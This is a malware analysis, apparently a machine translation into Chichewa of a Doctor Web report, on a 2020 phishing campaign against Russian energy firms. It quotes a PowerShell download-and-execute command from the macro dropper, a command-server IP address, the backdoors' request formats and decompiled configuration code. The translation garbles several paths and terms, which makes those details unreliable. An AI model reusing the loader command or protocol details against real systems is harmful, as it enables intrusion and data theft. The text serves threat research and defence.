Zomwe takumana nazo pofufuza zochitika zachitetezo pakompyuta zikuwonetsa kuti maimelo akadali amodzi mwa njira zomwe zimakonda kugwiritsidwa ntchito ndi omwe akuwukira kuti alowe m'malo omwe akuwukira. Mchitidwe umodzi wosasamala wokhala ndi kalata yokayikitsa (kapena yosakayikitsa) imakhala malo olowera kuti munthu athe kutenga kachilomboka, chifukwa chake zigawenga zapaintaneti zikugwiritsa ntchito njira zamaukadaulo, ngakhale zikupambana mosiyanasiyana.
Mu positi iyi tikufuna kukambirana za kafukufuku wathu waposachedwa pa kampeni ya sipamu yomwe ikuyang'ana mabizinesi angapo ku Russia mafuta ndi mphamvu. Zowukira zonse zidatsata zomwezo pogwiritsa ntchito maimelo abodza, ndipo palibe amene akuwoneka kuti wachita khama kwambiri pazolemba za maimelowa.
Utumiki wanzeru
Zonse zidayamba kumapeto kwa Epulo 2020, pomwe akatswiri ofufuza za kachilombo ka Doctor Web adapeza kampeni ya sipamu pomwe obera adatumiza chikwatu chamafoni chosinthidwa kwa ogwira ntchito m'mabizinesi angapo aku Russia ndi mafuta. Inde, ichi sichinali chiwonetsero chophweka chodetsa nkhaΕ΅a, popeza bukhulo silinali lenileni, ndipo zolemba za .docx zinatsitsa zithunzi ziwiri kuchokera kuzinthu zakutali.
Chimodzi mwa izo chidatsitsidwa pakompyuta ya wogwiritsa ntchito kuchokera ku nkhani[.]zannews[.]com seva. Ndizodabwitsa kuti dzina lachidziwitso ndi lofanana ndi dera la anti-corruption media center of Kazakhstan - zannews[.]kz. Kumbali ina, domain yomwe idagwiritsidwa ntchito idakumbukiranso kampeni ina ya 2015 yotchedwa TOPNEWS, yomwe idagwiritsa ntchito ICEFOG kumbuyo ndipo inali ndi madera olamulira a Trojan okhala ndi "nkhani" zazing'ono m'maina awo. Chinthu chinanso chochititsa chidwi chinali chakuti potumiza maimelo kwa olandira osiyanasiyana, zopempha kuti mutsitse chithunzichi zimagwiritsidwa ntchito zosiyanasiyana zopempha kapena mayina apadera.
Tikukhulupirira kuti izi zidachitika ndi cholinga chosonkhanitsira zidziwitso kuti tidziwe "wodalirika" wotumizidwa, yemwe adzatsimikiziridwa kuti adzatsegula kalatayo panthawi yoyenera. Protocol ya SMB idagwiritsidwa ntchito kutsitsa chithunzicho kuchokera pa seva yachiwiri, yomwe ingatheke kusonkhanitsa ma hashes a NetNTLM kuchokera pamakompyuta a antchito omwe adatsegula chikalata chomwe adalandira.
Ndipo nayi kalata yomwe ili ndi chikwatu chabodza:
Mu June chaka chino, achiwembu adayamba kugwiritsa ntchito dzina latsopano, sports[.]manhajnews[.]com, kukweza zithunzi. Kuwunikaku kudawonetsa kuti manhajnews[.]com subdomains akhala akugwiritsidwa ntchito potumiza sipamu kuyambira osachepera Seputembala 2019. Chimodzi mwa zolinga za ntchitoyi chinali yunivesite yaikulu ya ku Russia.
Komanso, pofika mwezi wa June, okonza chiwonongekocho adadza ndi malemba atsopano a makalata awo: nthawi ino chikalatacho chinali ndi chidziwitso chokhudza chitukuko cha mafakitale. Malemba a kalatayo adawonetsa kuti wolemba wake sanali wolankhula Chirasha, kapena adapanga dala kuti adzimve yekha. Tsoka ilo, malingaliro okhudza chitukuko chamakampani, monga nthawi zonse, adakhala chivundikiro chabe - chikalatacho chidatsitsanso zithunzi ziwiri, pomwe seva idasinthidwa kutsitsa[.]inklingpaper[.]com.
Chidziwitso chotsatira chinatsatira mu July. Poyesa kusazindikira zikalata zoyipa ndi mapulogalamu a antivayirasi, owukira adayamba kugwiritsa ntchito zikalata za Microsoft Word zosungidwa ndi mawu achinsinsi. Nthawi yomweyo, owukirawo adaganiza zogwiritsa ntchito njira yaukadaulo yaukadaulo - chidziwitso cha mphotho.
Zolemba za apilozo zidalembedwanso mwanjira yomweyo, zomwe zidadzutsa kukayikira kowonjezereka pakati pa omwe adayankhayo. Seva yotsitsa chithunzicho sinasinthenso.
Dziwani kuti nthawi zonse, mabokosi a imelo olembetsedwa pamakalata[.]ru ndi yandex[.]ru madambwe adagwiritsidwa ntchito kutumiza makalata.
Kuukira
Pofika kumayambiriro kwa September 2020, inali nthawi yoti tichitepo kanthu. Ofufuza athu a virus adalemba ziwopsezo zatsopano, pomwe owukirawo adatumizanso makalata podzinamizira kuti akukonzanso kalozera wamafoni. Komabe, nthawi ino chophatikizikacho chinali ndi macro oyipa.
Mukatsegula chikalatacho, macro adapanga mafayilo awiri:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, yomwe cholinga chake chinali kuyambitsa fayilo ya batch;
- Fayilo ya batch yokha %APPDATA%configstest.bat, yomwe idasokonezedwa.
Chofunikira cha ntchito yake chimatsikira pakukhazikitsa chipolopolo cha Powershell ndi magawo ena. Magawo omwe amaperekedwa ku chipolopolo amasinthidwa kukhala malamulo:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Motsatira malamulo omwe aperekedwa, dera lomwe malipiro amatsitsidwa amasinthidwanso ngati tsamba la nkhani. A yosavuta , yomwe ntchito yake yokha ndiyo kulandira shellcode kuchokera ku lamulo ndi seva yolamulira ndikuichita. Tinatha kuzindikira mitundu iwiri ya zitseko zakumbuyo zomwe zitha kukhazikitsidwa pa PC ya wozunzidwayo.
BackDoor.Siggen2.3238
Choyamba ndi BackDoor.Siggen2.3238 - akatswiri athu anali asanakumanepo kale, ndipo panalibenso zonena za pulogalamuyi ndi ogulitsa ma antivayirasi ena.
Pulogalamuyi ndi yanyumba yakumbuyo yolembedwa mu C++ ndipo imagwira ntchito pamakina ogwiritsira ntchito a 32-bit Windows.
BackDoor.Siggen2.3238 imatha kulumikizana ndi seva yoyang'anira pogwiritsa ntchito ma protocol awiri: HTTP ndi HTTPS. Chitsanzo choyesedwa chimagwiritsa ntchito protocol ya HTTPS. Zotsatirazi zimagwiritsidwa ntchito popempha seva:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Pankhaniyi, zopempha zonse zimaperekedwa ndi magawo awa:
%s;type=%s;length=%s;realdata=%send
pomwe mzere uliwonse %s wasinthidwa ndi:
- ID ya kompyuta yomwe ili ndi kachilombo,
- mtundu wa pempho lotumizidwa,
- kutalika kwa data mu gawo la realdata,
- zambiri.
Pa gawo lotolera zambiri za dongosolo lomwe lili ndi kachilomboka, backdoor imapanga mzere monga:
lan=%s;cmpname=%s;username=%s;version=%s;
kumene lan ndi adilesi ya IP ya kompyuta yomwe ili ndi kachilombo, cmpname ndi dzina la kompyuta, lolowera ndi dzina la ogwiritsa, mtundu ndi mzere 0.0.4.03.
Uthengawu wokhala ndi chozindikiritsa cha sysinfo watumizidwa kudzera pa pempho la POST ku seva yowongolera yomwe ili pa https[:]//31.214[.]157.14/log.txt. Ngati poyankha BackDoor.Siggen2.3238 imalandira chizindikiro cha MTIMA, kulumikizidwa kumaonedwa kuti ndi kopambana, ndipo kumbuyo kumayamba njira yayikulu yolumikizirana ndi seva.
Kufotokozera kwathunthu kwa mfundo zoyendetsera ntchito BackDoor.Siggen2.3238 ali mwathu .
BackDoor.Whitebird.23
Pulogalamu yachiwiri ndikusinthidwa kwa BackDoor.Whitebird backdoor, zomwe tikudziwa kale kuchokera ku zomwe zinachitika ndi bungwe la boma ku Kazakhstan. Baibuloli linalembedwa mu C++ ndipo lakonzedwa kuti lizigwira ntchito pa makina onse a 32-bit ndi 64-bit Windows.
Monga mapulogalamu ambiri amtunduwu, BackDoor.Whitebird.23 opangidwa kuti akhazikitse kulumikizana kwachinsinsi ndi seva yowongolera ndikuwongolera kosavomerezeka kwa kompyuta yomwe ili ndi kachilombo. Kuikidwa mu dongosolo losokonezeka pogwiritsa ntchito dropper .
Chitsanzo chomwe tidachiwona chinali laibulale yoyipa yokhala ndi zinthu ziwiri zotumizidwa kunja:
- Google Play
- Mayeso.
Kumayambiriro kwa ntchito yake, imachotsa kasinthidwe kolimba kulowa m'chipinda chakumbuyo pogwiritsa ntchito algorithm yotengera XOR ndi byte 0x99. Kukonzekera kumawoneka motere:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Kuonetsetsa kuti ikugwira ntchito nthawi zonse, backdoor imasintha mtengo womwe watchulidwa m'munda maola_ntchito masinthidwe. Mundawu uli ndi ma byte 1440, omwe amatenga ma 0 kapena 1 ndikuyimira mphindi iliyonse ya ola lililonse patsiku. Amapanga ulusi wosiyana pa mawonekedwe aliwonse a netiweki omwe amamvera mawonekedwewo ndikuyang'ana mapaketi ovomerezeka pa seva ya proxy kuchokera pakompyuta yomwe ili ndi kachilombo. Paketi yotere ikapezeka, backdoor imawonjezera zambiri za seva ya proxy pamndandanda wake. Kuphatikiza apo, imayang'ana kukhalapo kwa proxy kudzera pa WinAPI InternetQueryOptionW.
Pulogalamuyi imayang'ana miniti ndi ola lapano ndikufanizira ndi zomwe zili m'munda maola_ntchito masinthidwe. Ngati mtengo wa miniti yofananira ya tsiku si zero, ndiye kuti kulumikizana kumakhazikitsidwa ndi seva yolamulira.
Kukhazikitsa kulumikizana ndi seva kumayerekezera kupangidwa kwa kulumikizana pogwiritsa ntchito protocol ya TLS 1.0 pakati pa kasitomala ndi seva. Thupi lakumbuyo lili ndi ma buffers awiri.
Buffer yoyamba ili ndi TLS 1.0 Client Hello paketi.
Buffer yachiwiri ili ndi mapaketi a TLS 1.0 Client Key Exchange okhala ndi kutalika kwa 0x100 byte, Change Cipher Spec, Encrypted Handshake Message.
Mukatumiza paketi ya Client Hello, kukhomo lakumbuyo limalemba ma byte 4 anthawi yathu ino ndi ma byte 28 a data yabodza mugawo la Client Random, zowerengedwa motere:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Paketi yolandiridwa imatumizidwa ku seva yolamulira. Yankho (Paketi ya Hello Server) imayang'ana:
- kutsatira TLS protocol version 1.0;
- kulemberana kwa nthawi (zoyamba 4 ma byte a Random Data packet field) zotchulidwa ndi kasitomala ku nthawi yotchulidwa ndi seva;
- mafananidwe a ma byte 4 oyamba pambuyo pa sitampu yanthawi mugawo la Random Data la kasitomala ndi seva.
Pakakhala machesi omwe atchulidwa, khola lakumbuyo limakonzekera paketi ya Client Key Exchange. Kuti muchite izi, imasintha Chifungulo cha Public mu phukusi la Client Key Exchange, komanso Encryption IV ndi Data Encryption mu Phukusi la Uthenga Wosungidwa Pamanja.
Pakhomo lakumbuyo limalandira paketi kuchokera ku seva yolamulira ndi yolamulira, imayang'ana kuti TLS protocol version ndi 1.0, ndiyeno amavomereza ma byte ena 54 (thupi la paketi). Izi zimamaliza kukhazikitsa kulumikizana.
Kufotokozera kwathunthu kwa mfundo zoyendetsera ntchito BackDoor.Whitebird.23 ali mwathu .
Mapeto ndi Mapeto
Kuwunika kwa zikalata, pulogalamu yaumbanda, ndi zomangamanga zomwe zimagwiritsidwa ntchito zimatilola kunena molimba mtima kuti kuukirako kudakonzedwa ndi gulu limodzi la APT aku China. Poganizira ntchito za backdoors zomwe zimayikidwa pamakompyuta a ozunzidwa pakachitika chiwopsezo chopambana, matenda amatsogolera, pang'onopang'ono, kuba kwa zinsinsi zamakompyuta a mabungwe omwe akuwukiridwa.
Kuphatikiza apo, chochitika chotheka kwambiri ndikuyika ma Trojans apadera pama seva am'deralo omwe ali ndi ntchito yapadera. Awa akhoza kukhala olamulira, ma seva a makalata, zipata za intaneti, ndi zina zotero. Monga tikuonera mu chitsanzo , ma seva oterowo amakhala osangalatsa kwambiri kwa omwe akuukira pazifukwa zosiyanasiyana.
Source: www.habr.com